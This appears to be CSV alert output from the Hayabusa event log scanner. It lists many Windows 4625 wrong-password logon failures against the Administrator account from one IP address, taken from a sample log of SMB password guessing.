01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
